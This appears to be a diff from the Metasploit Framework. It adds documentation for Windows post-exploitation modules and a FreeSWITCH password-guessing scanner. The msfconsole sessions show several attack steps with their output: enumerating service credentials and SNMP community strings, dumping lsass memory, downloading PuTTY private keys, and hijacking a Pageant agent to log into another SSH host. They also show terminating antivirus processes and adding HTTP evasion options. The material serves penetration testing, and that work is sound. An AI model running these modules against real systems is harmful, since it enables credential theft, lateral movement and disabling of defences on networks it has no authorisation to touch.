+[*] 	AzureRM.LogicApp
+[*] 	AzureRM.MachineLearning
+[*] 	AzureRM.MachineLearningCompute
+[*] 	AzureRM.MarketplaceOrdering
+[*] 	AzureRM.Media
+[*] 	AzureRM.Network
+[*] 	AzureRM.NotificationHubs
+[*] 	AzureRM.OperationalInsights
+[*] 	AzureRM.PowerBIEmbedded
+[*] 	AzureRM.Profile
+[*] 	AzureRM.RecoveryServices
+[*] 	AzureRM.RecoveryServices.Backup
+[*] 	AzureRM.RecoveryServices.SiteRecovery
+[*] 	AzureRM.RedisCache
+[*] 	AzureRM.Relay
+[*] 	AzureRM.Resources
+[*] 	AzureRM.Scheduler
+[*] 	AzureRM.ServerManagement
+[*] 	AzureRM.ServiceBus
+[*] 	AzureRM.ServiceFabric
+[*] 	AzureRM.SiteRecovery
+[*] 	AzureRM.Sql
+[*] 	AzureRM.Storage
+[*] 	AzureRM.StreamAnalytics
+[*] 	AzureRM.Tags
+[*] 	AzureRM.TrafficManager
+[*] 	AzureRM.UsageAggregates
+[*] 	AzureRM.Websites
+[*] 	Microsoft.PowerShell.Operation.Validation
+[*] 	PackageManagement
+[*] 	Pester
+[*] 	PowerShellGet
+[*] 	PSReadline
+[*] 	AppBackgroundTask
+[*] 	AppLocker
+[*] 	AppvClient
+[*] 	Appx
+[*] 	AssignedAccess
+[*] 	BitLocker
+[*] 	BitsTransfer
+[*] 	BranchCache
+[*] 	CimCmdlets
+[*] 	ConfigCI
+[*] 	ConfigDefender
+[*] 	ConfigDefenderPerformance
+[*] 	Defender
+[*] 	DeliveryOptimization
+[*] 	DirectAccessClientComponents
+[*] 	Dism
+[*] 	DnsClient
+[*] 	EventTracingManagement
+[*] 	Get-NetView
+[*] 	HostNetworkingService
+[*] 	International
+[*] 	iSCSI
+[*] 	ISE
+[*] 	Kds
+[*] 	Microsoft.PowerShell.Archive
+[*] 	Microsoft.PowerShell.Diagnostics
+[*] 	Microsoft.PowerShell.Host
+[*] 	Microsoft.PowerShell.LocalAccounts
+[*] 	Microsoft.PowerShell.Management
+[*] 	Microsoft.PowerShell.ODataUtils
+[*] 	Microsoft.PowerShell.Security
+[*] 	Microsoft.PowerShell.Utility
+[*] 	Microsoft.Windows.Bcd.Cmdlets
+[*] 	Microsoft.WSMan.Management
+[*] 	MMAgent
+[*] 	MsDtc
+[*] 	NetAdapter
+[*] 	NetConnection
+[*] 	NetEventPacketCapture
+[*] 	NetLbfo
+[*] 	NetNat
+[*] 	NetQos
+[*] 	NetSecurity
+[*] 	NetSwitchTeam
+[*] 	NetTCPIP
+[*] 	NetworkConnectivityStatus
+[*] 	NetworkSwitchManager
+[*] 	NetworkTransition
+[*] 	PcsvDevice
+[*] 	PersistentMemory
+[*] 	PKI
+[*] 	PnpDevice
+[*] 	PrintManagement
+[*] 	ProcessMitigations
+[*] 	Provisioning
+[*] 	PSDesiredStateConfiguration
+[*] 	PSDiagnostics
+[*] 	PSScheduledJob
+[*] 	PSWorkflow
+[*] 	PSWorkflowUtility
+[*] 	ScheduledTasks
+[*] 	SecureBoot
+[*] 	SmbShare
+[*] 	SmbWitness
+[*] 	StartLayout
+[*] 	Storage
+[*] 	StorageBusCache
+[*] 	TLS
+[*] 	TroubleshootingPack
+[*] 	TrustedPlatformModule
+[*] 	UEV
+[*] 	VMDirectStorage
+[*] 	VpnClient
+[*] 	Wdac
+[*] 	Whea
+[*] 	WindowsDeveloperLicense
+[*] 	WindowsErrorReporting
+[*] 	WindowsSearch
+[*] 	WindowsUpdate
+[*] Checking if users have PowerShell profiles
+[*] Checking User
+[*] Post module execution completed
+```
+
@@ -0,0 +1,172 @@
+## Vulnerable Application
+
+This module will query the system for services and return the display name and
+configuration info for each returned service. You can also optionally
+filter the results by using query strings to match on specific
+credentials, paths, or start types and only return the results that match.
+These query operations are cumulative and if no query strings are specified,
+the module will just return all services. NOTE: If the script hangs,
+Windows Defender Firewall is most likely on and you did not migrate
+to a safe process (explorer.exe for example).
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session
+3. Do: `use post/windows/gather/enum_services`
+4. Do: `set SESSION <session id>`
+5. Do: `run`
+
+## Options
+
+### CRED
+
+String to search returned service credentials for.
+
+### PATH
+
+String to search returned service paths for.
+
+### TYPE
+
+Service startup types to display (`All`, `Auto`, `Manual`, `Disabled`) (default: `All`)
+
+## Scenarios
+
+### Windows Server 2008 SP1 (x64)
+
+```
+msf6 > use post/windows/gather/enum_services
+msf6 post(windows/gather/enum_services) > set session 1
+session => 1
+msf6 post(windows/gather/enum_services) > run
+
+[*] Listing Service Info for matching services, please wait...
+[+] New service credential detected: AeLookupSvc is running as 'localSystem'
+[+] New service credential detected: ALG is running as 'NT AUTHORITY\LocalService'
+[+] New service credential detected: CryptSvc is running as 'NT Authority\NetworkService'
+[*] Found 114 Windows services matching filters
+
+Services
+========
+
+ Name                            Credentials                  Command   Startup
+ ----                            -----------                  -------   -------
+ ALG                             NT AUTHORITY\LocalService    Manual    C:\Windows\System32\alg.exe
+ AeLookupSvc                     localSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ AppMgmt                         LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k netsvcs
+ Appinfo                         LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k netsvcs
+ AudioEndpointBuilder            LocalSystem                  Manual    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
+ AudioSrv                        NT AUTHORITY\LocalService    Manual    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
+ BFE                             NT AUTHORITY\LocalService    Auto      C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
+ BITS                            LocalSystem                  Auto      C:\Windows\System32\svchost.exe -k netsvcs
+ Browser                         LocalSystem                  Disabled  C:\Windows\System32\svchost.exe -k netsvcs
+ COMSysApp                       LocalSystem                  Manual    C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
+ CertPropSvc                     LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k netsvcs
+ CryptSvc                        NT Authority\NetworkService  Auto      C:\Windows\system32\svchost.exe -k NetworkService
+ CscService                      LocalSystem                  Disabled  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
+ DFSR                            LocalSystem                  Auto      C:\Windows\system32\DFSRs.exe
+ DNS                             LocalSystem                  Auto      C:\Windows\system32\dns.exe
+ DPS                             NT AUTHORITY\LocalService    Auto      C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork
+ DcomLaunch                      LocalSystem                  Auto      %SystemRoot%\system32\svchost.exe -k DcomLaunch
+ Dfs                             LocalSystem                  Auto      C:\Windows\system32\dfssvc.exe
+ Dhcp                            NT Authority\LocalService    Auto      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
+ Dnscache                        NT AUTHORITY\NetworkService  Auto      C:\Windows\system32\svchost.exe -k NetworkService
+ EapHost                         localSystem                  Manual    C:\Windows\System32\svchost.exe -k netsvcs
+ EventLog                        NT AUTHORITY\LocalService    Auto      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
+ EventSystem                     NT AUTHORITY\LocalService    Auto      C:\Windows\system32\svchost.exe -k LocalService
+ FCRegSvc                        NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
+ FDResPub                        NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalService
+ IKEEXT                          LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ IPBusEnum                       LocalSystem                  Disabled  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
+ IsmServ                         LocalSystem                  Auto      C:\Windows\System32\ismserv.exe
+ KeyIso                          LocalSystem                  Manual    C:\Windows\system32\lsass.exe
+ KtmRm                           NT AUTHORITY\NetworkService  Auto      C:\Windows\System32\svchost.exe -k NetworkService
+ LanmanServer                    LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ LanmanWorkstation               NT AUTHORITY\LocalService    Auto      C:\Windows\System32\svchost.exe -k LocalService
+ MMCSS                           LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k netsvcs
+ MSDTC                           NT AUTHORITY\NetworkService  Auto      C:\Windows\System32\msdtc.exe
+ MSiSCSI                         LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k netsvcs
+ MpsSvc                          NT Authority\LocalService    Auto      C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
+ Netlogon                        LocalSystem                  Auto      C:\Windows\system32\lsass.exe
+ Netman                          LocalSystem                  Manual    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
+ NlaSvc                          NT AUTHORITY\NetworkService  Auto      C:\Windows\System32\svchost.exe -k NetworkService
+ NtFrs                           LocalSystem                  Auto      C:\Windows\system32\ntfrs.exe
+ PerfHost                        NT AUTHORITY\LocalService    Manual    C:\Windows\SysWow64\perfhost.exe
+ PlugPlay                        LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k DcomLaunch
+ PolicyAgent                     NT Authority\NetworkService  Auto      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
+ ProfSvc                         LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ ProtectedStorage                LocalSystem                  Manual    C:\Windows\system32\lsass.exe
+ RSoPProv                        LocalSystem                  Manual    C:\Windows\system32\RSoPProv.exe
+ RasAuto                         localSystem                  Manual    C:\Windows\System32\svchost.exe -k netsvcs
+ RasMan                          localSystem                  Manual    C:\Windows\System32\svchost.exe -k netsvcs
+ RemoteAccess                    localSystem                  Disabled  C:\Windows\System32\svchost.exe -k netsvcs
+ RemoteRegistry                  NT AUTHORITY\LocalService    Auto      C:\Windows\system32\svchost.exe -k regsvc
+ RpcLocator                      NT AUTHORITY\NetworkService  Manual    C:\Windows\system32\locator.exe
+ RpcSs                           NT AUTHORITY\NetworkService  Auto      %SystemRoot%\system32\svchost.exe -k rpcss
+ SCPolicySvc                     LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k netsvcs
+ SCardSvr                        NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalService
+ SENS                            LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ SLUINotify                      NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalService
+ SNMP                            LocalSystem                  Auto      C:\Windows\System32\snmp.exe
+ SNMPTRAP                        NT AUTHORITY\LocalService    Manual    C:\Windows\System32\snmptrap.exe
+ SSDPSRV                         NT AUTHORITY\LocalService    Disabled  C:\Windows\system32\svchost.exe -k LocalService
+ SamSs                           LocalSystem                  Auto      C:\Windows\system32\lsass.exe
+ Schedule                        LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ SessionEnv                      localSystem                  Manual    C:\Windows\System32\svchost.exe -k netsvcs
+ SharedAccess                    LocalSystem                  Disabled  C:\Windows\System32\svchost.exe -k netsvcs
+ ShellHWDetection                LocalSystem                  Auto      C:\Windows\System32\svchost.exe -k netsvcs
+ Spooler                         LocalSystem                  Auto      C:\Windows\System32\spoolsv.exe
+ SstpSvc                         NT Authority\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalService
+ SysMain                         LocalSystem                  Disabled  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
+ TBS                             NT AUTHORITY\LocalService    Auto      C:\Windows\System32\svchost.exe -k LocalService
+ THREADORDER                     NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalService
+ TapiSrv                         NT AUTHORITY\NetworkService  Manual    C:\Windows\System32\svchost.exe -k tapisrv
+ TermService                     NT Authority\NetworkService  Auto      C:\Windows\System32\svchost.exe -k NetworkService
+ Themes                          LocalSystem                  Disabled  C:\Windows\System32\svchost.exe -k netsvcs
+ TrkWks                          LocalSystem                  Manual    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
+ TrustedInstaller                localSystem                  Manual    C:\Windows\servicing\TrustedInstaller.exe
+ UI0Detect                       LocalSystem                  Manual    C:\Windows\system32\UI0Detect.exe
+ UmRdpService                    localSystem                  Manual    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
+ UxSms                           localSystem                  Auto      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
+ VSS                             LocalSystem                  Manual    C:\Windows\system32\vssvc.exe
+ W32Time                         NT AUTHORITY\LocalService    Auto      C:\Windows\system32\svchost.exe -k LocalService
+ WPDBusEnum                      LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
+ WcsPlugInService                NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k wcssvc
+ WdiServiceHost                  NT AUTHORITY\LocalService    Manual    C:\Windows\System32\svchost.exe -k wdisvc
+ WdiSystemHost                   LocalSystem                  Manual    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
+ Wecsvc                          NT AUTHORITY\NetworkService  Manual    C:\Windows\system32\svchost.exe -k NetworkService
+ WerSvc                          localSystem                  Auto      C:\Windows\System32\svchost.exe -k WerSvcGroup
+ WinHttpAutoProxySvc             NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalService
+ WinRM                           NT AUTHORITY\NetworkService  Auto      C:\Windows\System32\svchost.exe -k NetworkService
+ Winmgmt                         localSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ clr_optimization_v2.0.50727_32  LocalSystem                  Manual    C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
+ clr_optimization_v2.0.50727_64  LocalSystem                  Manual    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
+ dot3svc                         localSystem                  Manual    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
+ fdPHost                         NT AUTHORITY\LocalService    Manual    C:\Windows\system32\svchost.exe -k LocalService
+ gpsvc                           LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k GPSvcGroup
+ hidserv                         LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
+ hkmsvc                          localSystem                  Manual    C:\Windows\System32\svchost.exe -k netsvcs
+ iphlpsvc                        LocalSystem                  Auto      C:\Windows\System32\svchost.exe -k NetSvcs
+ kdc                             LocalSystem                  Auto      C:\Windows\System32\lsass.exe
+ lltdsvc                         NT AUTHORITY\LocalService    Manual    C:\Windows\System32\svchost.exe -k LocalService
+ lmhosts                         NT AUTHORITY\LocalService    Auto      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
+ msiserver                       LocalSystem                  Manual    C:\Windows\system32\msiexec /V
+ napagent                        NT AUTHORITY\NetworkService  Manual    C:\Windows\System32\svchost.exe -k NetworkService
+ netprofm                        NT AUTHORITY\LocalService    Auto      C:\Windows\System32\svchost.exe -k LocalService
+ nsi                             NT Authority\LocalService    Auto      C:\Windows\system32\svchost.exe -k LocalService
+ pla                             NT AUTHORITY\LocalService    Manual    %SystemRoot%\System32\svchost.exe -k LocalServiceNoNetwork
+ sacsvr                          LocalSystem                  Manual    C:\Windows\System32\svchost.exe -k netsvcs
+ seclogon                        LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ slsvc                           NT AUTHORITY\NetworkService  Auto      C:\Windows\system32\SLsvc.exe
+ swprv                           LocalSystem                  Manual    C:\Windows\System32\svchost.exe -k swprv
+ upnphost                        NT AUTHORITY\LocalService    Disabled  C:\Windows\system32\svchost.exe -k LocalService
+ vds                             LocalSystem                  Manual    C:\Windows\System32\vds.exe
+ wercplsupport                   localSystem                  Manual    C:\Windows\System32\svchost.exe -k netsvcs
+ wmiApSrv                        localSystem                  Manual    C:\Windows\system32\wbem\WmiApSrv.exe
+ wuauserv                        LocalSystem                  Auto      C:\Windows\system32\svchost.exe -k netsvcs
+ wudfsvc                         LocalSystem                  Manual    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
+
+[+] Loot file stored in: /root/.msf4/loot/20220820231513_default_192.168.200.218_windows.services_350986.txt
+[*] Post module execution completed
+```
@@ -0,0 +1,57 @@
+## Vulnerable Application
+
+This module will enumerate configured and recently used file shares.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session
+3. Do: `use post/windows/gather/enum_shares`
+4. Do: `set SESSION <session id>`
+5. Do: `run`
+
+## Options
+
+### CURRENT
+
+Enumerate currently configured shares (default: `true`)
+
+### RECENT
+
+Enumerate recently mapped shares (default: `true`)
+
+### ENTERED
+
+Enumerate recently entered UNC Paths in the Run Dialog (default: `true`)
+
+## Scenarios
+
+### Windows Server 2008 (x64)
+
+```
+msf6 > use post/windows/gather/enum_shares
+msf6 post(windows/gather/enum_shares) > set session 1
+session => 1
+msf6 post(windows/gather/enum_shares) > run
+
+[*] Running module against WIN-17B09RRRJTG (192.168.200.218)
+[*] The following shares were found:
+[*] 	Name: SYSVOL
+[*] 	Path: C:\Windows\SYSVOL\sysvol
+[*] 	Remark: Logon server share 
+[*] 	Type: DISK
+[*] 
+[*] 	Name: NETLOGON
+[*] 	Path: C:\Windows\SYSVOL\sysvol\corp.local\SCRIPTS
+[*] 	Remark: Logon server share 
+[*] 	Type: DISK
+[*] 
+[*] Recent mounts found:
+[*] 	\\127.0.0.1\C$
+[*] 
+[*] Recent UNC paths entered in Run dialog found:
+[*] 	\\10.1.1.100\
+[*] 	\\127.0.0.1\C$
+[*] 
+[*] Post module execution completed
+```
@@ -0,0 +1,45 @@
+## Vulnerable Application
+
+This module will enumerate the SNMP service configuration.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session
+3. Do: `use post/windows/gather/enum_snmp`
+4. Do: `set SESSION <session id>`
+5. Do: `run`
+
+## Options
+
+## Scenarios
+
+### Windows Server 2008 (x64)
+
+```
+msf6 > use post/windows/gather/enum_snmp
+msf6 post(windows/gather/enum_snmp) > set session 1
+session => 1
+msf6 post(windows/gather/enum_snmp) > run
+
+[*] Running module against WIN-17B09RRRJTG (192.168.200.218)
+[*] Checking if SNMP service is installed
+[*] 	SNMP is installed!
+[*] Enumerating community strings
+[*] 
+[*] 	Community Strings
+[*] 	=================
+[*] 	
+[*] 	 Name    Type
+[*] 	 ----    ----
+[*] 	 secret  READ & WRITE
+[*] 	 test    READ ONLY
+[*] 
+[*] Enumerating Permitted Managers for Community Strings
+[*] 	SNMP packets are accepted from any host
+[*] Enumerating Trap configuration
+[*] Community Name: test
+[*] 	Destination: 127.0.0.1
+[*] 	Destination: snmp.local
+[*] Post module execution completed
+```
@@ -13,7 +13,7 @@ This module only works on a Meterpreter session on Windows.
  1. Get meterpreter session on a Windows host
  1. Do: `use post/windows/gather/memory_dump`
  1. Do: `set SESSION <session id>`
-  1. Do: `set PID <process id>`
+  1. Do: `set PID <process id>` or `set PROCESS_NAME <process name>`
  1. Do: `set DUMP_PATH <path on remote system>`
  1. Do: `set DUMP_TYPE <standard|full>`
  1. Do: `run`
@@ -26,13 +26,19 @@ This module only works on a Meterpreter session on Windows.

 The path that the memory dump will be temporarily stored at. This file is then
 downloaded and deleted at the end of the run. This file should be in a writable
-location, and should not already exist.
+location, and should not already exist. If not specified, the dump is written
+with a random filename in `%TEMP%`.

 ### PID

 The ID of the process to dump. To find the PID, in your Meterpreter session,
 type `ps`. To find a process by name, type `ps | <process name>`.

+### PROCESS_NAME
+
+The name of the process(es) to dump. This will dump memory for all processes
+with this name.
+
 ### DUMP_TYPE

 Two options are provided for creating a memory dump:
@@ -55,7 +61,7 @@ significantly smaller than the Full option.

 ## Scenarios

-**Dumping lsass**
+### Dumping lsass

 Retrieving lsass (after getsystem)

@@ -126,5 +132,3 @@ SID               : S-1-5-21-920577323-754201681-977916534-1001
        credman :
        cloudap :
 ```
-
-
@@ -0,0 +1,120 @@
+## Vulnerable Application
+
+This module forwards SSH agent requests from a local socket to a remote Pageant instance.
+If a target Windows machine is compromised and is running Pageant, this will allow the
+attacker to run normal OpenSSH commands (e.g. ssh-add -l) against the Pageant host which are
+tunneled through the meterpreter session. This could therefore be used to authenticate
+with a remote host using a private key which is loaded into a remote user's Pageant instance,
+without ever having knowledge of the private key itself.
+
+Note that this requires the PageantJacker meterpreter extension, but this will be automatically
+loaded into the remote meterpreter session by this module if it is not already loaded.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a Meterpreter session
+3. Do: `use post/windows/manage/forward_pageant`
+4. Do: `set SESSION <session id>`
+5. Do: `run`
+
+## Options
+
+### SocketPath
+
+Specify a filename for the local UNIX socket. (default path is random)
+
+## Scenarios
+
+### Pageant 0.77.0.0 on Windows 7 SP1 (x64)
+
+Use `windows/gather/enum_putty_saved_sessions` to detect Pageant and known hosts:
+
+```
+msf6 > use post/windows/gather/enum_putty_saved_sessions
+msf6 post(windows/gather/enum_putty_saved_sessions) > set session 1
+session => 1
+msf6 post(windows/gather/enum_putty_saved_sessions) > run
+
+[*] Looking for saved PuTTY sessions
+[*] Found 3 sessions
+
+PuTTY Saved Sessions
+====================
+
+ Name             HostName         UserName  PublicKeyFile                       PortNumber  PortForwardings  ProxyUsername  ProxyPassword
+ ----             --------         --------  -------------                       ----------  ---------------  -------------  -------------
+ 192.168.200.158  192.168.200.158            C:\Users\user\Desktop\ubuntu22.ppk  22
+ example.com      example.com                C:\Users\user\Desktop\serial1.ppk   22
+ serial1                                     C:\Users\user\Desktop\serial1.ppk   0
+
+[+] PuTTY saved sessions list saved to /root/.msf4/loot/20220807223341_default_192.168.200.190_putty.sessions.c_273976.txt in CSV format & available in notes (use 'notes -t putty.savedsession' to view).
+[*] Downloading private keys...
+[+] PuTTY private key file for '192.168.200.158' (C:\Users\user\Desktop\ubuntu22.ppk) saved to: /root/.msf4/loot/20220807223341_default_192.168.200.190_putty.ppk.file_988729.bin
+[+] PuTTY private key file for 'example.com' (C:\Users\user\Desktop\serial1.ppk) saved to: /root/.msf4/loot/20220807223342_default_192.168.200.190_putty.ppk.file_341943.bin
+[+] PuTTY private key file for 'serial1' (C:\Users\user\Desktop\serial1.ppk) saved to: /root/.msf4/loot/20220807223342_default_192.168.200.190_putty.ppk.file_265111.bin
+
+
+PuTTY Private Keys
+==================
+
+ Name             HostName         UserName  PublicKeyFile                       Type  Cipher  Comment
+ ----             --------         --------  -------------                       ----  ------  -------
+ 192.168.200.158  192.168.200.158            C:\Users\user\Desktop\ubuntu22.ppk
+ example.com      example.com                C:\Users\user\Desktop\serial1.ppk
+ serial1                                     C:\Users\user\Desktop\serial1.ppk
+
+
+[*] Looking for previously stored SSH host key fingerprints
+[*] Found 1 stored key fingerprint
+[*] Downloading stored key fingerprints...
+
+Stored SSH host key fingerprints
+================================
+
+ SSH Endpoint        Key Type(s)
+ ------------        -----------
+ 192.168.200.158:22  ssh-ed25519
+
+[+] PuTTY stored host keys list saved to /root/.msf4/loot/20220807223342_default_192.168.200.190_putty.storedfing_027625.txt in CSV format & available in notes (use 'notes -t putty.storedfingerprint' to view).
+
+[*] Looking for Pageant...
+[+] Pageant is running (Handle 0x330820)
+[*] Post module execution completed
+
+```
+
+Establish a local forward with `post/windows/manage/forward_pageant`:
+
+```
+msf6 > use post/windows/manage/forward_pageant 
+msf6 post(windows/manage/forward_pageant) > set session 1
+session => 1
+msf6 post(windows/manage/forward_pageant) > run
+
+[*] Launched listening socket on /tmp/bVN4Dg2W
+[*] Set SSH_AUTH_SOCK variable to /tmp/bVN4Dg2W (e.g. export SSH_AUTH_SOCK="/tmp/bVN4Dg2W")
+[*] Now use any SSH tool normally (e.g. ssh-add)
+```
+
+Specify the `SSH_AUTH_SOCK` UNIX socket path when using ssh tools:
+
+```
+$ SSH_AUTH_SOCK="/tmp/bVN4Dg2W" ssh-add -l
+3072 SHA256:/M07p51CmCSMrV1lbFs19OMvyRw6g9Wxbq8bW5px0KA asdf@ubuntu-22-04-amd64 (RSA)
+
+$ SSH_AUTH_SOCK="/tmp/bVN4Dg2W" ssh asdf@192.168.200.158
+Welcome to Ubuntu 22.04 LTS (GNU/Linux 5.15.0-25-generic x86_64)
+
+ * Documentation:  https://help.ubuntu.com
+ * Management:     https://landscape.canonical.com
+ * Support:        https://ubuntu.com/advantage
+
+209 updates can be applied immediately.
+29 of these updates are standard security updates.
+To see these additional updates run: apt list --upgradable
+
+*** System restart required ***
+Last login: Sun Aug  7 22:19:04 2022 from 192.168.200.130
+asdf@ubuntu-22-04-amd64:~$ 
+```
@@ -0,0 +1,34 @@
+## Vulnerable Application
+
+This module attempts to locate and terminate any processes that are identified
+as being Antivirus or Host-based IPS related.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get a session
+3. Do: `use post/windows/manage/killav`
+4. Do: `set SESSION <session id>`
+5. Do: `run`
+
+## Options
+
+
+## Scenarios
+
+### Windows 7 SP1 (x64)
+
+```
+msf6 > use post/windows/manage/killav
+msf6 post(windows/manage/killav) > set session 1
+session => 1
+msf6 post(windows/manage/killav) > run
+
+[*] Attempting to terminate 'antivirus.exe' (PID: 5340) ...
+[+] antivirus.exe (PID: 5340) terminated.
+[*] Attempting to terminate 'regedit.exe' (PID: 2296) ...
+[+] regedit.exe (PID: 2296) terminated.
+[+] A total of 2 process(es) were discovered, 2 were terminated.
+[*] Post module execution completed
+msf6 post(windows/manage/killav) > 
+```
@@ -231,7 +231,7 @@ _arguments \
  "--list-options[List --payload <value>'s standard, advanced and evasion options]" \
  "--pad-nops[Use nopsled size specified by -n \<length\> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)]" \
  "--platform[The platform for --payload (use --list platforms to list)]:target platform:_msfvenom_platform" \
-  {-a,--arch}"[The architecture to use for --payload and --encoders (use --list archs to list)]:architecture:_msfvenom_archs" \
+  {-a,--arch}"[The architecture to use for --payload and --encoders (use --list archs to list)]:architecture:_msfvenom_arch" \
  {-b,--bad-chars}"[Characters to avoid example: '\x00\xff']:bad characters" \
  {-c,--add-code}"[Specify an additional win32 shellcode file to include]:shellcode file:_files" \
  {-e,--encoder}"[The encoder to use (use --list encoders to list)]:encoder:_msfvenom_encoder" \
@@ -93,7 +93,7 @@ module Metasploit
      # @return [Pathname] if the user has a `database.yml` in their config directory (`~/.msf4` by default).
      # @return [nil] if the user does not have a `database.yml` in their config directory.
      def self.user_configurations_pathname
-        Pathname.new(Msf::Config.get_config_root).join('database.yml')
+        Pathname.new(Msf::Config.config_directory).join('database.yml')
      end
    end
  end
@@ -0,0 +1,80 @@
+require 'metasploit/framework/login_scanner/base'
+require 'metasploit/framework/login_scanner/rex_socket'
+require 'metasploit/framework/tcp/client'
+
+module Metasploit
+  module Framework
+    module LoginScanner
+
+      # This is the LoginScanner class for dealing with FreeSWITCH EventSocket.
+      # It is responsible for taking a single target, and a list of credentials
+      # and attempting them. It then saves the results.
+
+      class FreeswitchEventSocket
+        include Metasploit::Framework::LoginScanner::Base
+        include Metasploit::Framework::LoginScanner::RexSocket
+        include Metasploit::Framework::Tcp::Client
+
+        DEFAULT_PORT         = 8021
+        LIKELY_PORTS         = [ DEFAULT_PORT ]
+        LIKELY_SERVICE_NAMES = [ 'freeswitch' ]
+        PRIVATE_TYPES        = [ :password ]
+        REALM_KEY            = nil
+
+        # This method attempts a single login with a single credential against the target
+        # @param credential [Credential] The credential object to attempt to login with
+        # @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
+        def attempt_login(credential)
+          result_options = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            host: host,
+            port: port,
+            protocol: 'tcp',
+            service_name: 'freeswitch'
+          }
+
+          disconnect if self.sock
+
+          begin
+            connect
+            select([sock], nil, nil, 0.4)
+
+            sock.get_once
+            sock.put("auth #{credential.private}\n\n")
+
+            /Reply-Text: (?<reply>.*)/ =~ sock.get_once
+            result_options[:proof] = reply
+
+            # Invalid password - ( -ERR invalid\n\n )
+            # Valid password   - ( +OK accepted\n\n )
+
+            if result_options[:proof]&.include?('-ERR invalid')
+              result_options[:status] = Metasploit::Model::Login::Status::INCORRECT
+            elsif result_options[:proof]&.include?('+OK accepted')
+              result_options[:status] = Metasploit::Model::Login::Status::SUCCESSFUL
+            end
+
+          rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE, Rex::StreamClosedError => e
+            result_options.merge!(
+              proof: e.message,
+              status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+            )
+          end
+          disconnect if self.sock
+          ::Metasploit::Framework::LoginScanner::Result.new(result_options)
+        end
+
+        private
+
+        # (see Base#set_sane_defaults)
+        def set_sane_defaults
+          self.connection_timeout  ||= 10
+          self.port                ||= DEFAULT_PORT
+          self.max_send_size       ||= 0
+          self.send_delay          ||= 0
+        end
+      end
+    end
+  end
+end
@@ -117,6 +117,14 @@ module Metasploit
        #   @return [Integer] How many fake post variables to insert into the request
        attr_accessor :evade_pad_post_params_count

+        # @!attribute evade_shuffle_get_params
+        #   @return [Boolean] Randomize order of GET parameters
+        attr_accessor :evade_shuffle_get_params
+
+        # @!attribute evade_shuffle_post_params
+        #   @return [Boolean] Randomize order of POST parameters
+        attr_accessor :evade_shuffle_post_params
+
        # @!attribute evade_uri_fake_end
        #   @return [Boolean] Whether to add a fake end of URI (eg: /%20HTTP/1.0/../../)
        attr_accessor :evade_uri_fake_end
@@ -327,6 +335,8 @@ module Metasploit
            'pad_get_params_count'   => evade_pad_get_params_count,
            'pad_post_params'        => evade_pad_post_params,
            'pad_post_params_count'  => evade_pad_post_params_count,
+            'shuffle_get_params'     => evade_shuffle_get_params,
+            'shuffle_post_params'    => evade_shuffle_post_params,
            'uri_fake_end'           => evade_uri_fake_end,
            'uri_fake_params_start'  => evade_uri_fake_params_start,
            'header_folding'         => evade_header_folding,
@@ -52,8 +52,13 @@ module Metasploit
            else
